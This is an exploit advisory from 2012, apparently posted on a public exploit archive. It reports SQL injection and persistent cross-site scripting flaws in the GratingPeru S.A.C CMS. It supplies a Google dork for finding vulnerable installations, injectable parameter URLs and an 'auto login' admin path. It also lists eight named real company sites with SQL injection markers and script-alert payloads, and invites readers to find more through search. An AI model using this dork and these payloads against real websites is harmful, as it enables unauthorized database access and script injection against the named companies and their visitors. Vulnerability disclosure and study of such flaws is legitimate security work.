CMS GratingPeru S.A.C Cross Site Scripting / SQL Injection

CMS GratingPeru S.A.C Cross Site Scripting / SQL Injection: Posted Apr 28, 2012; Authored by the_cyber_nuxbie; CMS GratingPeru S.A.C suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | cd880ae80f357995e86aa35da84af90210c858d7b132f4c0e19a1425b0225847; Download | Favorite | View

CMS GratingPeru S.A.C Cross Site Scripting / SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
0                I'm NuxbieCyber Member From Inj3ct0r TEAM               1
1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

==========================================================================
<<<:>>>  CMS GratingPeru S.A.C - SQLi/XSS Presistent Vulnerability  <<:>>>
==========================================================================
                                                          
 - Discovered By:
 ||| TheCyberNuxbie - Independent Security Research |||
 <<< nuxbie@linuxhacktivist.com >>> CP: +62856-2538-963
 [ www.linuxhacktivist.com ] $ YM: nux_exploit
 
 - Google Dork:
 intext:"© GRATING PERÚ S.A.C. TODOS LOS DERECHOS RESERVADOS"
 
 - Exploit Concept:
 http://lokalisasi/WebApps/productos.php?producto_id=[SQL Injection]
 http://lokalisasi/WebApps/categorias.php?categoria_id=[SQL Injection]
 http://lokalisasi/WebApps/subcategorias.php?subcategoria_id=[SQL Injection]
 http://lokalisasi/WebApps/productos.php?producto_id=[XSS]
 http://lokalisasi/WebApps/categorias.php?categoria_id=[XSS]
 http://lokalisasi/WebApps/subcategorias.php?subcategoria_id=[XSS]
 
 - Private Area:
 http://lokalisasi/WebApps/admin/ <--- Auto LogIn Area...!!!

 - Sampel WebApps SQLi Vulnerability:
 http://www.gratingperu.com/productos/productos.php?producto_id=27' + [SQL Injection]
 http://www.gratingvenezuela.com/productos/categorias.php?categoria_id=9' + [SQL Injection]
 http://www.gratingcostarica.com/productos/categorias.php?categoria_id=9' + [SQL Injection]
 http://www.gratingchile.com/productos/productos.php?producto_id=10' + [SQL Injection]
 http://www.gratingla.com/productos/subcategorias.php?subcategoria_id=39' + [SQL Injection]
 http://www.gratingecuador.com/productos/productos.php?producto_id=14' + [SQL Injection]
 http://www.gratinguruguay.com/productos/categorias.php?categoria_id=11' + [SQL Injection]
 http://www.gratingpanama.com/productos/productos.php?producto_id=14' + [SQL Injection]
 , And More @ Google...!!!

 - Sampel WebApps XSS Presistent Vulnerability:
 http://www.gratingchile.com/productos/productos.php?producto_id=<script>alert(31337);</script> <:- 'XSS' -:>
 http://www.gratingcostarica.com/productos/categorias.php?categoria_id=<script>alert(31337);</script> <:- 'XSS' -:>
 http://www.gratingvenezuela.com/productos/categorias.php?categoria_id=<script>alert(31337);</script> <:- 'XSS' -:>
 http://www.gratingperu.com/productos/productos.php?producto_id=<script>alert(31337);</script> <:- 'XSS' -:>
 http://www.gratingla.com/productos/subcategorias.php?subcategoria_id=<script>alert(31337);</script> <:- 'XSS' -:>
 http://www.gratingecuador.com/productos/productos.php?producto_id=<script>alert(31337);</script> <:- 'XSS' -:>
 http://www.gratinguruguay.com/productos/categorias.php?categoria_id=<script>alert(31337);</script> <:- 'XSS' -:>
 http://www.gratingpanama.com/productos/productos.php?producto_id=<script>alert(31337);</script> <:- 'XSS' -:>
 , And More @ Google...!!!

 - NoteLove For Reynaey:
 Jika aku sudah sukses, I will marry you,,, :-)
 
 -:>>> Special Thanks <<<:-
 ...:::' 1337day Inj3ct0r TEAM ':::...
 [ All Staff & 31337 Member Inj3ct0r TEAM ]
 , And All Inj3ct0r Fans & All Hacktivist,,, :-) 

 #########################################################################
 - Me @ Solo Raya, 29 April 2012 @ 03:16 AM.
 [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de ]
 #########################################################################

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

CMS GratingPeru S.A.C Cross Site Scripting / SQL Injection

CMS GratingPeru S.A.C Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMS GratingPeru S.A.C Cross Site Scripting / SQL Injection

Share This

CMS GratingPeru S.A.C Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems